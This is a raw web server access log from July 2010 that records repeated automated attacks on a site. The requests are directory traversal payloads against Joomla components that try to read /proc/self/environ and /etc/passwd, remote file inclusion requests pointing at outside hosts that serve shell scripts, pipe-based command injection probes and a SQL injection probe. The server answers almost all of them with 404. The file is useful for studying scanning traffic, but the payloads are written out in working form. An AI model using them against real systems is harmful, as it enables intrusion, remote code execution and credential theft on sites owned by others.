194.149.14.77 - - [26/Jul/2010:18:15:47 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:21:15 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:23:29 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:23:29 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:24:25 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:24:25 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:24:40 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:24:40 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
168.143.19.89 - - [26/Jul/2010:18:26:14 +0200] "GET //index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.825"
212.13.195.84 - - [26/Jul/2010:18:26:21 +0200] "GET //index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.813"
194.149.14.77 - - [26/Jul/2010:18:26:52 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:26:52 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:26:52 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
212.13.195.84 - - [26/Jul/2010:18:30:24 +0200] "GET /logs/access_log//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.813"
212.13.195.84 - - [26/Jul/2010:18:30:24 +0200] "GET //index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.813"
212.13.195.84 - - [26/Jul/2010:18:30:24 +0200] "GET /logs//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.813"
188.127.248.175 - - [26/Jul/2010:18:33:58 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:18:33:59 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
216.117.144.54 - - [26/Jul/2010:18:34:00 +0200] "GET //index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
88.131.106.2 - - [26/Jul/2010:18:35:54 +0200] "GET /robots.txt HTTP/1.0" 404 297 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
88.131.106.6 - - [26/Jul/2010:18:35:55 +0200] "GET /?C=N%3BO=D HTTP/1.0" 200 560 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
216.117.144.54 - - [26/Jul/2010:18:44:19 +0200] "GET /logs/access_log//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.79"
216.117.144.54 - - [26/Jul/2010:18:44:19 +0200] "GET //index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.79"
216.117.144.54 - - [26/Jul/2010:18:44:19 +0200] "GET /logs//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.79"
168.143.19.89 - - [26/Jul/2010:18:48:25 +0200] "GET /logs/access_log//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.825"
168.143.19.89 - - [26/Jul/2010:18:48:25 +0200] "GET //index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.825"
168.143.19.89 - - [26/Jul/2010:18:48:25 +0200] "GET /logs//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.825"
194.149.14.77 - - [26/Jul/2010:18:49:46 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:49:46 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
194.149.14.77 - - [26/Jul/2010:18:49:47 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
188.127.248.175 - - [26/Jul/2010:18:56:26 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:18:56:26 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:18:56:51 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:18:56:51 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
211.202.2.34 - - [26/Jul/2010:18:59:53 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:18:59:53 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:18:59:54 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:18:59:54 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:18:59:54 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 313 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:18:59:54 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
168.143.19.89 - - [26/Jul/2010:19:06:37 +0200] "GET /logs/access_log//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.825"
168.143.19.89 - - [26/Jul/2010:19:06:37 +0200] "GET //index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.825"
168.143.19.89 - - [26/Jul/2010:19:06:37 +0200] "GET /logs//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.825"
74.55.73.74 - - [26/Jul/2010:19:10:34 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
188.127.248.175 - - [26/Jul/2010:19:14:47 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:19:14:47 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:19:14:48 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:19:15:04 +0200] "GET /logs/access_log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:19:15:04 +0200] "GET //index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:19:15:05 +0200] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.808"
74.55.73.74 - - [26/Jul/2010:19:27:50 +0200] "GET /logs/access_log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:19:27:50 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
74.55.73.74 - - [26/Jul/2010:19:27:51 +0200] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
211.202.2.34 - - [26/Jul/2010:19:28:12 +0200] "GET //index.php?option=com_rokdownloads&controller=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 297 "-" "stealth solo"
211.202.2.34 - - [26/Jul/2010:19:28:13 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 302 "-" "stealth solo"
211.202.2.34 - - [26/Jul/2010:19:28:13 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 313 "-" "stealth solo"
211.202.2.34 - - [26/Jul/2010:19:28:13 +0200] "GET //index.php?option=com_rokdownloads&controller=%7Cecho%20%22stealth%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "stealth solo"
211.202.2.34 - - [26/Jul/2010:19:28:13 +0200] "GET /logs//index.php?option=com_rokdownloads&controller=%7Cecho%20%22stealth%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "stealth solo"
211.202.2.34 - - [26/Jul/2010:19:28:13 +0200] "GET /logs/access_log//index.php?option=com_rokdownloads&controller=%7Cecho%20%22stealth%22;echo%20%22kae%22;%7C HTTP/1.1" 404 313 "-" "stealth solo"
207.46.204.187 - - [26/Jul/2010:19:43:03 +0200] "GET /robots.txt HTTP/1.1" 404 297 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.187 - - [26/Jul/2010:19:49:27 +0200] "GET / HTTP/1.1" 200 560 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.16.18.219 - - [26/Jul/2010:19:55:10 +0200] "GET /logs/access_log/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:19:55:10 +0200] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:19:55:11 +0200] "GET /logs/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
188.165.217.175 - - [26/Jul/2010:20:01:22 +0200] "GET //index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
188.127.248.175 - - [26/Jul/2010:20:02:01 +0200] "GET //index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:20:02:01 +0200] "GET //index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.808"
89.200.169.163 - - [26/Jul/2010:20:02:06 +0200] "GET //index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:20:02:06 +0200] "GET //index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.813"
211.202.2.34 - - [26/Jul/2010:20:02:56 +0200] "GET //index.php?option=com_ckforms&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:20:02:56 +0200] "GET /logs/access_log%20%20//index.php?option=com_ckforms&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:20:02:56 +0200] "GET /logs//index.php?option=com_ckforms&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:20:02:56 +0200] "GET /logs/access_log%20%20//index.php?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:20:02:56 +0200] "GET //index.php?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:20:02:56 +0200] "GET /logs//index.php?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
188.165.217.175 - - [26/Jul/2010:20:07:47 +0200] "GET /logs/access_log//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:20:07:48 +0200] "GET //index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:20:07:48 +0200] "GET /logs//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.803"
89.200.169.163 - - [26/Jul/2010:20:08:19 +0200] "GET /logs/access_log//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:20:08:19 +0200] "GET //index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:20:08:20 +0200] "GET /logs//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:20:08:49 +0200] "GET /logs/access_log//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:20:08:50 +0200] "GET //index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.813"
89.200.169.163 - - [26/Jul/2010:20:08:50 +0200] "GET /logs//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.813"
188.127.248.175 - - [26/Jul/2010:20:10:21 +0200] "GET /logs/access_log//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:20:10:21 +0200] "GET //index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:20:10:22 +0200] "GET /logs//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.808"
174.121.241.255 - - [26/Jul/2010:20:10:25 +0200] "GET //index2.inc.php?ID=' HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
188.127.248.175 - - [26/Jul/2010:20:10:32 +0200] "GET /logs/access_log//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:20:10:32 +0200] "GET //index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:20:10:33 +0200] "GET /logs//index2.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.808"
217.16.18.219 - - [26/Jul/2010:20:22:22 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
213.229.106.147 - - [26/Jul/2010:20:25:34 +0200] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
213.229.106.147 - - [26/Jul/2010:20:25:34 +0200] "GET /logs/access_log//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
213.229.106.147 - - [26/Jul/2010:20:25:34 +0200] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
213.229.106.147 - - [26/Jul/2010:20:25:39 +0200] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
213.229.106.147 - - [26/Jul/2010:20:25:39 +0200] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
213.229.106.147 - - [26/Jul/2010:20:25:39 +0200] "GET /logs/access_log//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
211.202.2.34 - - [26/Jul/2010:20:33:15 +0200] "GET /logs/access_log%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:20:33:15 +0200] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:20:33:15 +0200] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:20:33:16 +0200] "GET /logs/access_log%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 315 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:20:33:16 +0200] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 297 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:20:33:16 +0200] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 302 "-" "MaMa CaSpEr"
217.16.18.219 - - [26/Jul/2010:20:41:03 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:20:41:04 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:20:41:04 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
213.229.106.147 - - [26/Jul/2010:20:52:35 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:20:54:12 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
213.229.106.147 - - [26/Jul/2010:20:59:20 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
213.229.106.147 - - [26/Jul/2010:20:59:20 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
213.229.106.147 - - [26/Jul/2010:20:59:21 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:02:00 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:05:50 +0200] "GET /logs/access_log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:05:50 +0200] "GET //index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
217.16.18.219 - - [26/Jul/2010:21:05:51 +0200] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
188.165.217.175 - - [26/Jul/2010:21:06:19 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:21:06:31 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:21:07:07 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
119.192.145.144 - - [26/Jul/2010:21:07:29 +0200] "GET /logs/access_log//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:21:07:30 +0200] "GET //index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
119.192.145.144 - - [26/Jul/2010:21:07:30 +0200] "GET /logs//index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.805"
188.127.248.175 - - [26/Jul/2010:21:07:49 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:21:07:51 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.165.217.175 - - [26/Jul/2010:21:10:04 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:21:10:04 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:21:10:04 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
188.127.248.175 - - [26/Jul/2010:21:16:29 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:21:16:30 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:21:16:30 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
188.165.217.175 - - [26/Jul/2010:21:16:34 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:21:16:35 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
188.165.217.175 - - [26/Jul/2010:21:16:35 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
188.127.248.175 - - [26/Jul/2010:21:16:40 +0200] "GET /logs/access_log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:21:16:41 +0200] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.808"
188.127.248.175 - - [26/Jul/2010:21:16:41 +0200] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
193.43.92.192 - - [26/Jul/2010:21:21:07 +0200] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.836"
